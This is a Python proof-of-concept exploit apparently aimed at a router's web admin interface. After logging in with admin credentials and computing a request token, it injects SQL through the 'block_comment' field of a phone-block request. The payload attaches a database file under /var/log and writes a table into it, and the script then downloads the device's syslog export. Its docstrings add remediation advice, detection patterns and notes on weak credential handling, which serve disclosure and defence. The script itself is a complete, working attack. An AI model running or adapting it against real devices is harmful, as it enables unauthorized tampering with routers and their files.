import time
import requests
import hashlib
import sys
import base64
# Firmware identification strings for the build this script was written
# against. get_AD() hashes their concatenation, so they are fixed inputs that
# any client knowing the firmware build can supply; neither is a secret.
wa_inner_version = "BD_POSTEMF286RMODULEV1.0.0B12"
cr_version = "CR_ITPOSTEMF286RV1.0.0B10"


def FORM(x):
    """Return the base form body for the goform action named *x*."""
    return {"isTest": False, "goformId": x}


# A single requests.Session is shared by login(), sqli() and get_log(), so
# cookies set by one response are sent with the following requests.
s = requests.Session()
def login():
    """Authenticate the shared session against the device's web interface.

    Posts the ``LOGIN`` goform action with the module-level ``PASSWD`` value
    and prints whether the device answered with result ``"0"``. A failed login
    is only reported on stdout: nothing is returned or raised, so the caller
    carries on regardless.
    """
    # PASSWD is the base64 form of the admin password (see the __main__
    # block). base64 is an encoding, not protection: when HOST is an http://
    # URL, as the usage text shows, the password is recoverable by anyone who
    # can observe the traffic.
    payload = FORM("LOGIN")
    payload["password"] = PASSWD
    response = s.post(
        f"{HOST}/goform/goform_set_cmd_process",
        headers=HDRS,
        data=payload,
    )
    reply = response.json()
    outcome = "success" if reply["result"] == "0" else "fail"
    print("[+] Login: " + outcome)
def get_AD():
    """Compute the ``AD`` value that sqli() attaches to its POST request.

    The result is ``md5(md5(wa_inner_version + cr_version) + RD)`` as a
    lowercase hex string, where ``RD`` is read from the device just before.

    Both inputs are available to the client: the version strings are constants
    and ``RD`` is returned by the device on request. The value therefore proves
    only that the sender knows the firmware build and fetched a fresh ``RD``.
    NOTE(review): this looks like a request-forgery token; confirm against the
    firmware before relying on that reading.
    """

    def md5(text):
        # Hex digest of the UTF-8 encoding of ``text``.
        return hashlib.md5(text.encode("utf-8")).hexdigest()

    version_digest = md5(wa_inner_version + cr_version)
    # Sent with a bare requests.get rather than the session ``s``, so no
    # session cookies accompany this call.
    rd_reply = requests.get(
        f"{HOST}/goform/goform_get_cmd_process?isTest=false&cmd=RD&_={int(time.time())}",
        headers=HDRS,
    )
    return md5(version_digest + rd_reply.json()["RD"])
def get_response(server_resp):
    """Print whether the device's reply to the test request reported success.

    The check is a plain substring match for ``"success"`` anywhere in the
    response body. It shows only that the request was accepted, not what the
    device did with it.
    """
    accepted = "success" in server_resp.text
    print("[+] payload injected: " + ("success" if accepted else "fail"))
def sqli():
    """Send the proof-of-concept ``PHONE_BLOCK_ADD`` request and report the reply.

    The ``block_comment`` field closes a quoted value and a parenthesis and
    then carries further SQL statements, ending in a comment marker. This
    implies the firmware builds its SQLite statement by concatenating the
    field into the query text. That is inferred from the payload; the
    server-side code is not visible here.

    Device-side remediation: bind ``block_comment`` (and ``block_number``) as
    statement parameters, execute exactly one prepared statement per request,
    and deny ATTACH on the connection, for example with an authorizer callback
    (``sqlite3_set_authorizer``) or by setting ``SQLITE_LIMIT_ATTACHED`` to 0.
    For detection, look for ``ATTACH DATABASE`` or ``;`` inside
    ``block_comment`` on ``goform_set_cmd_process``, and for SQLite file
    headers appearing in files under ``/var/log``.
    """
    # Path named in the ATTACH clause of the test string below.
    target = "/var/log/webshow_messages"

    block_form = FORM("PHONE_BLOCK_ADD")
    block_form.update(
        {
            "block_number": "testestesttest",
            "block_comment": f"test'); ATTACH DATABASE '{target}' AS t; CREATE TABLE t.pwn (dataz text);INSERT INTO t.pwn (dataz) VALUES ('testestesttest');--",
            # Computed immediately before the POST; see get_AD() for inputs.
            "AD": get_AD(),
        }
    )

    reply = s.post(
        f"{HOST}/goform/goform_set_cmd_process",
        headers=HDRS,
        data=block_form,
    )
    get_response(reply)
def get_log():
    """Fetch the device's syslog export and save it to ``last-log.txt``.

    The body returned by ``/cgi-bin/ExportSyslog.sh`` is printed and written
    verbatim. An empty body produces no output and no file. The HTTP status is
    not checked, so an error page with a non-empty body is saved as if it were
    the log.
    """
    export = s.get(f"{HOST}/cgi-bin/ExportSyslog.sh", headers=HDRS)
    body = export.text
    if not body:
        return

    # The export may hold sensitive device data; it is echoed to stdout and
    # kept on disk in the current working directory, overwriting any earlier
    # last-log.txt.
    print(body)
    print("[+] Logs written into last-log.txt")
    with open("last-log.txt", "w") as logf:
        logf.write(body)
if __name__ == "__main__":
    # Two positional arguments are required: the base URL of the device and
    # the admin password. The script needs valid admin credentials; it is
    # not a pre-authentication test.
    if len(sys.argv) <= 2:
        print("usage: python3 run.py http://<router_ip> <admin_password>")
        sys.exit(0)

    # Module-level globals read by login(), get_AD(), sqli() and get_log().
    HOST = sys.argv[1]
    HDRS = {
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
        # Origin and Referer are set to the device's own URL, as a browser on
        # the admin page would send them.
        "Origin": HOST,
        "Referer": f"{HOST}/index.html",
    }
    # The password is passed on the command line, so it ends up in shell
    # history and is visible in the local process list while the script runs.
    # It is base64-encoded for the login form, which offers no confidentiality.
    PASSWD = str(base64.b64encode(sys.argv[2].encode()), "utf-8")

    # Order matters: authenticate, send the test request, then pull the log
    # export to observe the effect.
    login()
    sqli()
    get_log()